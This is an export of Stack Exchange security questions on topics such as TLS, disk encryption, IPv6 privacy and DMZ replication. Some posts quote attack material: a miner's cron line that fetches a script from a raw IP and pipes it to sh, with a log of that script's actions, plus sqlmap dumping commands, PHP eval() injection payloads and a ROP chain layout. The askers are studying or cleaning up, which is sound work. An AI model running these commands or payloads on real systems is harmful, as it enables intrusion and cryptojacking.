+",78901,,,,,1/10/2020 16:45,Is RDP user enumeration possible?,,0,2,1,,,CC BY-SA 4.0 +224002,1,,,1/10/2020 20:01,,2,93,"

At my company, we have a new development team that has been completely rewriting all of the code for different parts of the system.

+ +

I've noticed that with one of the recent changes, you can now see the JSON data for all of the fields and values for each field that exist in our database for that particular section of an account where a user is logged in. You can do so simply by using Developer Tools in Chrome.

+ +

Is this a bad idea from an information security perspective? Why or why not?

+ +

Disclaimer: I am not part of any development team, but would like to make others aware so that this can be dealt with appropriately if it is a security concern.

+",43408,,,,,1/10/2020 20:16,Code Change That Resulted in Database Fields and Values Exposed,,1,0,,,,CC BY-SA 4.0 +224005,1,,,1/10/2020 20:51,,2,82,"

Is there a way to establish data sharing between multiple (a couple dozen) businesses where it is the case that some companies don't trust others?

+ +

This means that these companies are willing to share some of their sensitive data with only a select few, while they are OK with sharing less sensitive data with everyone. (They can further restrict who sees it based on the sensitivity.) The data includes things like financial information, so each company would want to aggregate all the sources of data it has access to in order to grasp the current situation.

+",224830,,123514,,1/10/2020 20:52,1/10/2020 20:58,Multi-business data sharing and trust issues,,1,4,,,,CC BY-SA 4.0 +224007,1,,,1/10/2020 22:16,,1,182,"

I have a question that might sound a bit weird: A friend of mine (Person A) is being attacked by a former friend (Person B) and now person A asked me for help. Person A and Person B know each other from the internet and Person A used to trust Person B.

+ +

Generally speaking, Person A experiences network issues in his WiFi network.

+ +

Person B has access to Person A's iCloud account and other accounts. Also, Person B may have changed settings (VPN, certificates, ...) or installed apps on Person A's iPhone because Person B told Person A that he knows how to cheat in a smartphone game. Person A doesn't remember anymore what Person B told him to do. Person B never had physical access to the iPhone nor the router.

+ +

Apparently, Person B can launch an attack that stops the internet on Person A's iPhone for several minutes. This only concerns incoming traffic because during these attacks Person A can be heard by me on the call, but Person A can't hear me for the time of the attack.

+ +

This doesn't only affect the iPhone, but also other devices in the same WiFi network. That's why I was thinking that Person B might have access to the router, even though he could never have had physical access to it.

+ +

Person A is rather inexperienced with technology and, as far as I know, Person B is an experienced senior software developer who is interested in pentesting.

+ +

Does anyone have any idea what Person B might have done to Person A's iPhone/router and how he is remotely able to stop his internet?

+ +

I appreciate any help!

+",224832,,,,,1/13/2020 22:27,Attack that stops internet access for several minutes,,1,2,,,,CC BY-SA 4.0 +224013,1,,,1/11/2020 0:02,,1,129,"

While freelance software developers can show their work to potential clients by building personal projects or by showing previous clients' projects, how can a pentester do the same?

+ +

A pentester can't provide audit reports of previous clients, as they are confidential. If he is new, he may work for free for a few clients and show his work that way, but again, how would he show his work to potential clients without showing the actual reports?

+",224839,,6253,,1/11/2020 14:15,1/11/2020 18:15,How to show your work to potential clients as a pentester?,,2,11,,1/23/2020 10:09,,CC BY-SA 4.0 +224015,1,224017,,1/11/2020 4:29,,78,34722,"

I am not talking about home networks (like hacking my wifi and using it). Can someone from another geographical location steal my IP address in some way?

+ +

For example:

+ +
+

I am angry with you. -> I want to make you suffer and managed to find your IP address. -> I decided to steal your IP address (meaning replace my IP address with yours) in such a way that whatever I do, the feds are going to come after you. -> So I bought some illegal drugs from the dark web (with my replaced IP address). -> The feds catch you.

+
+ +

Is this scenario possible?

+",224842,,98538,,1/27/2020 8:35,3/19/2021 22:43,Can someone steal my IP address and use it as their own?,,5,5,27,,,CC BY-SA 4.0 +224016,1,,,1/11/2020 4:39,,0,32,"

I am trying to determine the type of encryption used for a site whose passwords are stored in the database. The site is built using FuelPHP. A stored password has the form (B65qdjYiMWzizMol7BmG4knKh4OAu9033kSAPcCK5Cs=). Which encryption is this?
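
For what it's worth, decoding the value shows its raw length, which may help narrow down the scheme:

printf '%s' 'B65qdjYiMWzizMol7BmG4knKh4OAu9033kSAPcCK5Cs=' | base64 -d | wc -c
# prints 32, i.e. the stored value is 32 bytes (256 bits) once base64-decoded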

+",224843,,,,,1/11/2020 4:39,Determine the type of encryption used,,0,2,,1/11/2020 14:12,,CC BY-SA 4.0 +224020,1,,,1/11/2020 7:32,,0,458,"

I'm wondering what bank-grade encryption looks like for traffic between a client (say, a Windows app) and a server, both on a local network. It seems that to use SSL encryption, they would need Internet access to verify the SSL certificate with the CA.
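
(For reference, one pattern that gets mentioned for this situation is a self-managed CA whose root certificate is distributed to the clients directly, so no Internet lookup is involved for validation; a rough sketch, with names and validity periods as placeholders only:)

# one-off: create a private root CA (keep ca.key offline)
openssl req -x509 -newkey rsa:4096 -nodes -days 3650 -subj /CN=Internal-Root-CA -keyout ca.key -out ca.crt
# per server: key + CSR, signed by the private CA
openssl req -newkey rsa:2048 -nodes -subj /CN=appserver.lan -keyout server.key -out server.csr
openssl x509 -req -in server.csr -CA ca.crt -CAkey ca.key -CAcreateserial -days 825 -out server.crt
# distribute ca.crt to the clients' trust stores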

+ +

What is the best encryption in practice now?

+ +

(Pardon me for novice's question if you think so, just point me to good read-ups pls)

+",175874,,,,,1/11/2020 8:10,How to encrypt data on local LAN (without Internet)?,,0,4,,1/11/2020 8:09,,CC BY-SA 4.0 +224021,1,,,1/11/2020 8:53,,1,935,"

Our support staff establish remote access connections from jumphosts that are isolated within a DMZ. To provide support they need project files (up to a few GB in size) which are stored on a file server within our LAN. Currently, the transfer is always done manually, which consumes a lot of time.

+ +

Therefore, we thought about replicating the files from the LAN to the DMZ. As I found out, from a security perspective it seems to be best practice to initiate a push from the internal file server to the DMZ file server. But the files need to be changed on the DMZ hosts too. So what about transferring data back?

+ +

We thought about initiating a pull from the internal LAN server. How is this seen from a security point of view? Is there another way to establish two-way file replication between the DMZ and the LAN that can be considered best practice?
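
For illustration, the pull we have in mind would look roughly like this (host name, account and paths are placeholders), run from the internal server so that only a LAN-to-DMZ connection is ever opened:

# executed on the internal LAN file server, e.g. from cron
rsync -az --delete -e ssh support@dmz-fileserver:/srv/projects/ /srv/projects/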

+ +

BR

+",224850,,,,,1/11/2020 13:43,Secure File Replication between LAN and DMZ,,1,2,,,,CC BY-SA 4.0 +224032,1,,,1/11/2020 16:56,,3,319,"

How to explain to traditional people why they should upgrade their old Windows XP device? <- The interesting point made in the highest upvoted answer to this Q is that a fully patched OS is largely insignificant for the security of an 'average home elder'. On the other hand, regular backups and AV software are essential.

+ +

While I do understand the point about backups, the point about patches vs. AV is surprising to me, precisely because I was usually told the opposite.

+ +

Usually, I was being told that for the security of a home user, the first points to consider are: Full disk encryption (defense against device theft), password managers that allow one to abandon reusing passwords (defense against hacked websites), fully patched software and enabled firewall (defense against malware, especially the kinds that infect the computer without a person's knowledge and consent), backups (defense against hardware failure and attacks that somehow slip through the other lines of defense).

+ +

Antivirus software, while still important, nonetheless is dead last on the above list because:

+ +
    +
  • The main purpose of AV is to defend against well-known, indiscriminate threats. This, as I understand, often means threats that would be stopped either by fully patched software or user's diligence (do not run unknown executables, do not click on links in phishing e-mail, ...) in the first place. Even worse, fully patched software paired with user's diligence will be able to stop far more threats than AV.
  • +
  • AVs slow the computer down and open up their own attack vector.
  • +
+ +

Sources (examples): 1, 2, 3

+ +

Of course user diligence cannot be relied upon (many claim the human is the weakest link in any security system), especially in the case of home elders, so I'm not going to argue that AV software is unimportant. It's just that I cannot see how a fully patched OS can be less important here.

+ +

Note that since we're talking about the 'average home elder', I do not consider it a realistic scenario that they are personally targeted. However, I should note that I've been told about a case in which a hacked parish website was installing malware on its visitors' computers. For this reason I'm not sure it is possible to rule out drive-by downloads.

+",108649,,108649,,1/11/2020 17:23,1/13/2020 11:38,Why is a fully-patched OS less important than AV?,,3,0,1,,,CC BY-SA 4.0 +224035,1,224038,,1/11/2020 17:53,,-1,271,"

I understand that it is easier for a human to intuitively figure out the alleged whereabouts of a machine if that machine's IP address is IPv6 rather than IPv4:

+ +

For example, since I changed my smartphone's Access Point Name (APN) protocol setting from the value IPv4 to the value IPv4/IPv6, generally all the different addresses I got after restarting my smartphone about 10 times started with:

+ +
+

2001:44c8:

+
+ +

That seems to me to indicate that the alleged whereabouts of my machine are in Bangkok, Thailand (based on 44c8), unless it's a proxy.

+ +

My problem

+ +

I started using IPv6 in the year 2020, and until that year I had come across only a few IPv4 addresses in my life. While all of those IPv4 addresses seemed to me intuitively, radically different from one another, and although I never went deep into learning how to calculate alleged whereabouts from an IPv4 address, I am quite confident that they don't intuitively expose the alleged whereabouts of a machine as easily as IPv6 addresses do (as with 44c8, for example, where a hacker only needs to remember that 44c8 represents Bangkok), whether or not a proxy hides the actual whereabouts of the machine.

+ +

Notes

+ +
    +
  • I use the word allegedly because, as most here know better than I do, a proxy can disguise the actual whereabouts of a machine

  • +
  • Of course there is automated geolocation for both IP address versions, but I aim to ask only about intuitive memorization (""oh, that's probably Bangkok""; ""oh, that's probably Paris""; ""oh yes, I was right"").

  • +
+ +

My question

+ +

Are IPv4 addresses intuitively harder to track than IPv6 addresses?
Or is my question based solely on some wrong assumption, making everything I wrote here nonsense?

+",,user123574,,,,1/11/2020 18:27,Are IPv4 more intuitively hard to track than IPv6?,,1,0,1,,,CC BY-SA 4.0 +224039,1,,,1/11/2020 18:31,,1,557,"

As a follow-up to the question in The DMZ, is an encrypted drive (full disk encrypted e.g. LUKS, BitLocker) protected against malware if it is not mounted when using a LiveCD?

+ +

The use case is that no other devices are available and there is a need to inspect potentially malicious files.

+ +

The assumptions are;

+ +
    +
  • The malware is not designed to wipe drives and for malware to wipe a drive it must be executed on the host that has a decrypted volume/partition.
  • +
  • When a drive is fully encrypted, there are no unencrypted blocks that the malware can write to without mounting the drive.
  • +
  • Malware can only affect an encrypted drive if it is mounted decrypted.
  • +
  • If malware is executed, when running a LiveCD, it is limited to memory and cannot affect firmware or BIOS.
  • +
  • Methods such as dd are not considered to be part of the threat model.
  • +
+ +

Note: The use of drive is synonymous with disk for the avoidance of doubt.

+",224867,,224867,,1/11/2020 19:12,1/11/2020 21:25,Is an encrypted hard drive immune from malware if it is not mounted when using a LiveCD?,,1,0,,,,CC BY-SA 4.0 +224043,1,,,1/11/2020 19:42,,4,111,"

Assuming that online storage providers are considered untrusted, if files and directories are encrypted, how can these be protected against fingerprinting?

+ +

The files are encrypted using rclone's implementation of Poly1305 and XSalsa20 before being backed up to the cloud provider.

+ +

According to rclone's documentation, the available metadata is file length, file modification date and directory structure.

+ +
    +
  • What can be identified?
  • +
  • What can be inferred?
  • +
  • What attack vectors are there against the encrypted files and directories if the online storage provider is compromised assuming the passphrase is at least 24 characters long and is a combination of alphanumeric and special characters (uppercase and lowercase) as well as salted with similar entropy?
  • +
+ +

The encrypted data is considered to be sensitive.

+ +

How can I protect those files from being fingerprinted and the contents inferred such as ownership, source and the like?

+",224867,,224867,,1/11/2020 20:08,1/11/2020 20:08,How can we protect encrypted files and directories from being fingerprinted when stored on online storage services?,,0,4,1,,,CC BY-SA 4.0 +224044,1,,,1/11/2020 20:15,,3,470,"

I am curious as to how bug hunters / pen testers use DirBuster and GoBuster without getting their IPs banned all the time (which is why I am asking)?

+",79490,,,,,3/21/2022 21:01,Avoiding WAF with DirBuster,,1,1,,,,CC BY-SA 4.0 +224047,1,224061,,1/11/2020 20:36,,1,264,"

For context, the coldcard hardware wallet has a number pad as input. In order to maintain my sanity, I'd like to input an alphanumeric passphrase using a single keypress for each letter or number.

+ +

So for example, the password ""boyhowdy123"" would be typed ""26946939123"".

+ +

I know that doing this loses some security (becomes easier to brute force crack) based on the number of words (or word sequences) that have the same numeric representation using this method as other words (or sequences).

+ +

My question is: approximately how much security is lost here? Am I missing anything that also affects the security of doing this? Is there anything published that analyses this kind of thing?
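
For a rough sense of scale: a random lowercase letter carries log2(26), about 4.7 bits, while the digit key it maps to can take only 8 values (2-9), so a truly random letter string gives up at most about 1.7 bits per character. For dictionary words the loss depends on how many words collide under the mapping, which can be estimated from any wordlist (the path below is just an example):

WL=/usr/share/dict/words
tr A-Z a-z < $WL | sort -u | wc -l                                        # distinct words
tr A-Z a-z < $WL | tr a-z 22233344455566677778889999 | sort -u | wc -l    # distinct key sequences
# log2(first count / second count) is roughly the bits given up per word for that list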

+",50631,,,,,1/13/2020 13:20,Approximately how much entropy/security is lost by typing passphrase words using a number pad?,,2,2,,,,CC BY-SA 4.0 +224048,1,,,1/11/2020 20:55,,0,30,"

I just heard that somebody uses MD5 for hashing passwords. I thought about helping them replace the algorithm with Argon2, but I am not sure which strategy to follow. I thought about 3 possible solutions:

+ +
    +
  • hashing the MD5 hash with Argon2 as a quick fix (not sure how secure it would be, because it will inherit the collisions of MD5, but maybe it is good as a temporary solution until we do one of the others)
  • +
  • replacing the hashes at login and removing or locking accounts that did not login after a few months
  • +
  • sending a mail to everybody that their password is compromised and they should use the password reset link immediately and they should not use their old password on any other website (maybe it makes too much panic)
  • +
+ +

But this was just naive thinking, maybe you can come up with a much better solution. Is there anything recommended in this scenario?

+",46259,,,,,1/11/2020 20:55,Strategies to replace password hashing algorithm?,,0,2,,1/11/2020 22:28,,CC BY-SA 4.0 +224050,1,224051,,1/11/2020 22:01,,0,3181,"

I have seen that most companies use the TLS 1.2 protocol. Why not use TLS 1.3?

+ +

My question here is: what are the pros and cons of both, and which is currently the better option?

+",,user224061,6253,,1/11/2020 22:06,8/10/2020 14:49,TLS1.2 vs TLS1.3,,3,3,,,,CC BY-SA 4.0 +224052,1,,,1/11/2020 22:35,,0,998,"

I am practicing on a vulnerable application, and I am asked to find an injection vulnerability with a payload. It states there is a common and simple filter in place. Then I need to extract the flag value from the chlns table. So I use sqlmap to find it.

+ +

Please read below and correct me if I am wrong in any stage:

+ +
sqlmap -u 'http://www.site.com/game.php?name=sarah' --dbs
+
+ +

When I run it, it says that it is being redirected to Facebook, and I press n to decline. Then it continues and finds 3 databases, as such:

+ +
-- information_schema
+-- chlns
+-- people
+
+ +

Then I run the following query:

+ +
sqlmap -u 'http://www.site.com/game.php?name=sarah' -D chlns --tables
+
+ +

to get all the tables. After it starts running it gives the below error:

+ +
[ERROR] unable to retrieve the table names for any database
+do you want to use common table existence check? [y/N/q] y
+
+ +

Then it asks for a file or to use the default wordlist, and I chose the default option. In the end it came up with a list of tables (13 overall), and I then used the command below for one of the table names:

+ +
sqlmap -u 'http://www.site.com/game.php?name=sarah' -D chlns T- table --dump
+
+ +

This command asks the same thing when I run it and wants to go through a wordlist. Each run takes a long time, around 10-15 minutes, and each time it comes up with an error like the one below:

+ +
HTTP error code: 414 (Request-URI Too Large) [*N times...
+
+ +

And I get nowhere. Am I doing anything wrong here, or is there an easier way? The exercise mentions there is a table called chlns, but it seems chlns is a database instead. This could be the case, as in another exercise chlns was the database and one was the name of the table where the flag existed.

+ +

Are there any suggestions to make this process easier, or any pro advice?

+ +

Thanks in advance,

+",208524,,208524,,1/12/2020 0:56,1/12/2020 0:56,Is this SQLMap query is correct?,,0,2,,,,CC BY-SA 4.0 +224053,1,224056,,1/11/2020 23:04,,0,1897,"

As far as I know Android (Pie) is encrypted by default with some hardware-based password. But how secure is this encryption?

+ +

I am not talking about password compromise, but if somebody gets my phone, he just needs to turn it on to get data decrypted, so what’s the point? For what cases is this encryption designed?

+",224874,,224874,,1/11/2020 23:11,1/11/2020 23:44,Is Android encryption secure?,,1,9,,1/21/2020 12:32,,CC BY-SA 4.0 +224059,1,224093,,1/12/2020 1:31,,2,621,"

My ROP exploit crashes with a segmentation fault for an unknown reason. This is the vulnerable code (compiled via the command gcc h2.c -no-pie -fno-stack-protector -m32 -o h2):

+
#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+char string[100];
+void exec_string() {
+    system(string);
+}
+
+void add_bin(int magic) {
+    if (magic == 0xdeadbeef) {
+        strcat(string, "/bin");
+    }
+}
+
+void add_sh(int magic1, int magic2) {
+    if (magic1 == 0xcafebabe && magic2 == 0x0badf00d) {
+        strcat(string, "/sh");
+    }
+}
+
+void vulnerable_function(char* string) {
+    char buffer[100];
+    strcpy(buffer, string);
+}
+
+int main(int argc, char** argv) {
+    string[0] = 0;
+    vulnerable_function(argv[1]);
+    return 0;
+}
+
+

I followed this example: https://medium.com/@nikhilh20/return-oriented-programming-rop-chaining-def0677923ad

+

In addition, there are no suitable gadgets of the pop; pop; ret pattern (actually, there are, but they are of the form pop [some reg]; pop ebp; ret, which messes up the stack, as do gadgets containing a leave instruction).

+

I've tried two different stack paddings for an exploit: the first one is identical to the primer in the link I provided above. The second one is (top - higher addresses, bottom - lower addresses):

+
address of exec_string
+garbage value
+0x0badf00d
+0xcafebabe
+add esp 8; pop ebx; ret <-- gadget
+address of add_sh
+0xdeadbeef
+pop; ret gadget <-- gadget
+address of add_bin <-- compromised instruction pointer after BoF
+AAAA
+....
+112 'A's to overflow the buffer and overwrite ebp (108 + 4)
+....
+AAAA
+
+

Let me explain the add esp, 8; pop ebx; ret gadget. There are no gadgets like pop [some reg]; pop [some reg, not ebp]; ret for chaining the call from add_sh to exec_string, so I tried a little hack. I chose the add esp, 8; pop ebx; ret gadget to pop off 0xcafebabe and 0x0badf00d via add esp, 8, then pop off a garbage, unreferenced value via pop ebx, and then ret to exec_string. Is that supposed to work at all? Correct me if I'm wrong.

+

Moreover, when I've started debugging, it results with:

+

+

Cool, it looks like I own the instruction pointer; I need to replace it with the address of the add_bin function to jump to it and start the ROP chain.

+

But... +

+

SIGSEGV at 0x91c2b1c2? I entered the correct add_bin address, and ASLR, PIE and canaries are disabled. I thought that maybe there is an undefined reference to the string argument that vulnerable_function receives, but in the primer linked above it was ignored, so this confused me a lot.

+",213386,,-1,,6/16/2020 9:49,1/13/2020 2:26,Cannot build a ROP chain,,2,0,,,,CC BY-SA 4.0 +224062,1,224065,,1/12/2020 4:03,,4,225,"

If a device uses full disk encryption such as LUKS, BitLocker (with a pin), Veracrypt and others and boots using a complex password, what is the need for complex passwords to log into the operating system thereafter and why?

+",224867,,,,,1/12/2020 17:38,Should operating system passwords be complex if full disk encryption is used that has a complex passphrase?,,3,0,,,,CC BY-SA 4.0 +224064,1,224067,,1/12/2020 4:33,,-1,102,"

Since I changed my smartphone's Access Point Name (APN) protocol setting from the value IPv4 to the value IPv4/IPv6, generally all the different addresses I got after restarting my smartphone about 10 times started with:

+ +
+

2001:44c8:

+
+ +

44c8 seems to me to stand for ""Bangkok, Thailand"".

+ +

Although the question might seem absurd:
Is there any way, besides surfing through a proxy IP address, to hide the rough whereabouts of a machine with IPv6?

+",,user123574,,,,1/12/2020 4:50,"Hiding rough whereabouts of a machine with IPv6, without using a proxy",,1,2,,,,CC BY-SA 4.0 +224069,1,,,1/12/2020 7:06,,1,144,"

CDNs are said to absorb and mitigate denial-of-service and DDoS attacks. Consider an application that uses a CDN provider to deliver its content. If an attacker tries to bring down such an application using a DoS or DDoS attack, the flood of requests made during the attack will go to the CDN servers. Will such a DDoS attack have to completely bring down all the CDN servers serving this application's content before completely impairing the origin server?

+",224882,,,,,1/19/2020 16:05,Does a DDOS attack on an application using CDN have to first bring down all the involved CDN servers to affect the application's availability?,,1,0,,,,CC BY-SA 4.0 +224070,1,,,1/12/2020 7:14,,-4,503,"

I'm not sure whether an administrator can see my screen while I use my computer. Can someone provide an answer with an explanation of how they could do it? I have an administrator on my computer, but not school-level security where they have things installed.

+",224883,,224885,,1/12/2020 9:50,1/12/2020 16:21,Can an administrator see screen time when I use my computer?,,2,3,,1/17/2020 6:19,,CC BY-SA 4.0 +224078,1,,,1/12/2020 15:16,,1,642,"

I'm trying to bypass a page that has an eval() and it works like this:

+ +
POST /anything.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+
+parameter1=aaa&parameter2=asdfas!-->
+
+<?php echo ""<p>1234</p>"");
+
+?>
+
+ +

And the result in the response is:

+ +
Common, debugging: <!-- print the array method _POST: <pre>Array
+(
+    [parameter1] => aaa
+    [parameter2] => asdfas!-->
+
+
+<?php echo ""<p>11</p>"");
+?>
+
+)
+</pre>-->
+
+ +

The result when I render the page is:

+ +
Common, debugging: 11
+"");?>)-->
+
+ +

I have tried many things, such as trying to escape the single and double quotes, but I have not been able to get the bypass. I only get errors when the eval()'d error page is rendered.

+ +

For example, if I put in the request:

+ +
<?php echo 'a';
+
+ +

The response is:

+ +
<br />
+<b>Parse error</b>:  syntax error, unexpected 'a' (T_STRING) in <b>/var/www/html/anything.php(10) : eval()'d code</b> on line <b>5</b><br />
+ Common, debugging: <!-- print the array method _POST: <pre>Array
+(
+    [parameter1] => aaa
+    [parameter2] => asdfas!-->
+
+
+<?php echo 'a';
+
+?>
+
+)
+</pre>-->
+
+ +

Could someone please point me in the direction of a bypass? Thank you very much.

+ +

Edited:

+ +

From what I've noticed, every time I submit code like this:

+ +
<?php echo(1); ?>
+
+ +

I get a page like this:

+ +
<!--?php echo(1); ?-->
+
+ +

I have seen the following resource, and it works for executing a JavaScript alert, but it doesn't let me achieve the bypass for PHP:

+ +

Exploiting PHP via GET params

+ +

My request:

+ +
POST /anything.php HTTP/1.1
+Host: 127.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 126
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+parameter1=anything1&parameter2=anything2</pre>.""!-->
+
+<!--  --><script>alert('Success');</script><!--  -->
+
+ +

Response:

+ +
HTTP/1.1 200 OK
+Date: Sun, 10 Jan 2020 23:26:34 GMT
+Server: Apache/2.x.x
+X-Powered-By: PHP/5.4
+Content-Length: 406
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<br />
+<b>Parse error</b>:  syntax error, unexpected 'Success' (T_STRING) in <b>/var/www/html/anything.php(13) : eval()'d code</b> on line <b>3</b><br />
+Common, debugging: <!-- print the array method _POST: <pre>Array
+(
+    [parameter1] => anything1
+    [parameter2] => anything2</pre>.""!-->
+
+<!--  --><script>alert('Success');</script><!--  -->
+
+)
+</pre>-->
+
+ +

And the alert is successfully executed.

+",224899,,224899,,1/12/2020 23:30,1/12/2020 23:30,How to abuse eval() in PHP,,0,8,,,,CC BY-SA 4.0 +224079,1,,,1/12/2020 16:07,,2,1286,"

I'm trying to get a v3 certificate, but I'm getting v1. I'm using the following commands:

+ +
openssl req -out server.csr -newkey rsa:2048 -nodes -keyout server.key -config san_server.cnf
+openssl ca -config san_server.cnf -create_serial -batch -in server.csr -out server.crt
+
+ +

Configuration file san_server.cnf content:

+ +
[ca]
+default_ca=CA_default
+
+[CA_default]
+dir=./ca
+database=$dir/index.txt
+new_certs_dir=$dir/newcerts
+serial=$dir/serial
+private_key=./ca.key
+certificate=./ca.crt
+default_days=3650
+default_md=sha256
+policy=policy_anything
+copy_extensions=copyall
+
+[policy_anything]
+countryName=optional
+stateOrProvinceName=optional
+localityName=optional
+organizationName=optional
+organizationalUnitName=optional
+commonName=optional
+emailAddress=optional
+
+[req]
+prompt=no
+distinguished_name=req_distinguished_name
+req_extensions=v3_req
+x509_extensions=v3_ca
+
+[req_distinguished_name]
+countryName=EN
+stateOrProvinceName=Some-State
+localityName=London
+organizationName=Internet Widgits Pty Ltd
+commonName=192.168.1.8
+
+[v3_req]
+subjectAltName=@alt_names
+
+[v3_ca]
+subjectAltName=@alt_names
+
+[alt_names]
+IP.1=127.0.0.1
+IP.2=192.168.1.8
+DNS.1=localhost
+
+ +

As a result I got a v1 certificate. How do I create a v3 one?
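
One thing I have since come across (not yet tested here) is that openssl ca only adds extensions, and therefore only emits a v3 certificate, when an extension section is applied at signing time, either via -extensions on the command line or via x509_extensions inside the [CA_default] section; a sketch of that variant:

openssl ca -config san_server.cnf -extensions v3_req -create_serial -batch -in server.csr -out server.crt
# or, equivalently, add the line x509_extensions=v3_req to the [CA_default] section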

+",161270,,161270,,1/12/2020 20:43,2/12/2020 13:03,Generate certificate v3 instead of v1,,1,0,1,,,CC BY-SA 4.0 +224081,1,,,1/12/2020 16:50,,3,770,"

For a few weeks, someone, probably a bot, has kept installing a bitcoin miner on my server. I notice it because it takes all the CPU. The process is named kdevtmpfsi, located at /tmp/kdevtmpfsi; there is a watchdog process, kinsing, located at /var/tmp/kinsing, and a cronjob:

+ +
* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1
+
+ +

I keep removing the traces above, but the attacker keeps re-injecting them, using the same exploit, which must be tied to the apache2 process, because here's what I find in my apache2 error log:

+ +
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                 Dload  Upload   Total   Spent    Left  Speed
+
+  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0sh: 2: ulimit: error setting limit (Operation not permitted)
+rm: cannot remove '/var/log/syslog': Permission denied
+
+100 27434  100 27434    0     0  4465k      0 --:--:-- --:--:-- --:--:-- 4465k
+chattr: Permission denied while setting flags on /tmp/
+chattr: Permission denied while setting flags on /var/tmp/
+ERROR: You need to be root to run this script
+iptables v1.6.1: can't initialize iptables table `filter': Permission denied (you must be root)
+Perhaps iptables or your kernel needs to be upgraded.
+sudo: no tty present and no askpass program specified
+sh: 10: cannot create /proc/sys/kernel/nmi_watchdog: Permission denied
+sh: 11: cannot create /etc/sysctl.conf: Permission denied
+userdel: user 'akay' does not exist
+userdel: user 'vfinder' does not exist
+chattr: Permission denied while trying to stat /root/.ssh/
+chattr: Permission denied while trying to stat /root/.ssh/authorized_keys
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+grep: Trailing backslash
+grep: write error: Broken pipe
+kill: (56): Operation not permitted
+kill: (25879): No such process
+kill: (25886): No such process
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+pkill: killing pid 807 failed: Operation not permitted
+pkill: killing pid 836 failed: Operation not permitted
+pkill: killing pid 836 failed: Operation not permitted
+log_rot: no process found
+chattr: No such file or directory while trying to stat /etc/ld.so.preload
+rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
+rm: cannot remove '/var/tmp/lib': No such file or directory
+rm: cannot remove '/var/tmp/.lib': No such file or directory
+chattr: No such file or directory while trying to stat /tmp/lok
+chmod: cannot access '/tmp/lok': No such file or directory
+sh: 477: docker: not found
+sh: 478: docker: not found
+sh: 479: docker: not found
+sh: 480: docker: not found
+sh: 481: docker: not found
+sh: 482: docker: not found
+sh: 483: docker: not found
+sh: 484: docker: not found
+sh: 485: docker: not found
+sh: 486: docker: not found
+sh: 487: docker: not found
+sh: 488: docker: not found
+sh: 489: docker: not found
+sh: 490: docker: not found
+sh: 491: docker: not found
+sh: 492: docker: not found
+sh: 493: docker: not found
+sh: 494: docker: not found
+sh: 495: docker: not found
+sh: 496: docker: not found
+sh: 497: docker: not found
+sh: 498: docker: not found
+sh: 499: setenforce: not found
+sh: 500: cannot create /etc/selinux/config: Permission denied
+Failed to stop apparmor.service: Interactive authentication required.
+See system logs and 'systemctl status apparmor.service' for details.
+Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install.
+Executing: /lib/systemd/systemd-sysv-install disable apparmor
+Failed to reload daemon: Interactive authentication required.
+update-rc.d: error: Permission denied
+Failed to stop aliyun.service.service: Interactive authentication required.
+See system logs and 'systemctl status aliyun.service.service' for details.
+Failed to disable unit: Interactive authentication required.
+sh: echo: I/O error
+md5sum: /var/tmp/kinsing: No such file or directory
+sh: echo: I/O error
+sh: echo: I/O error
+--2020-01-10 19:03:30--  https://bitbucket.org/kondrongo12/git/raw/master/kinsing
+Resolving bitbucket.org (bitbucket.org)... 18.205.93.2, 18.205.93.1, 18.205.93.0, ...
+Connecting to bitbucket.org (bitbucket.org)|18.205.93.2|:443... connected.
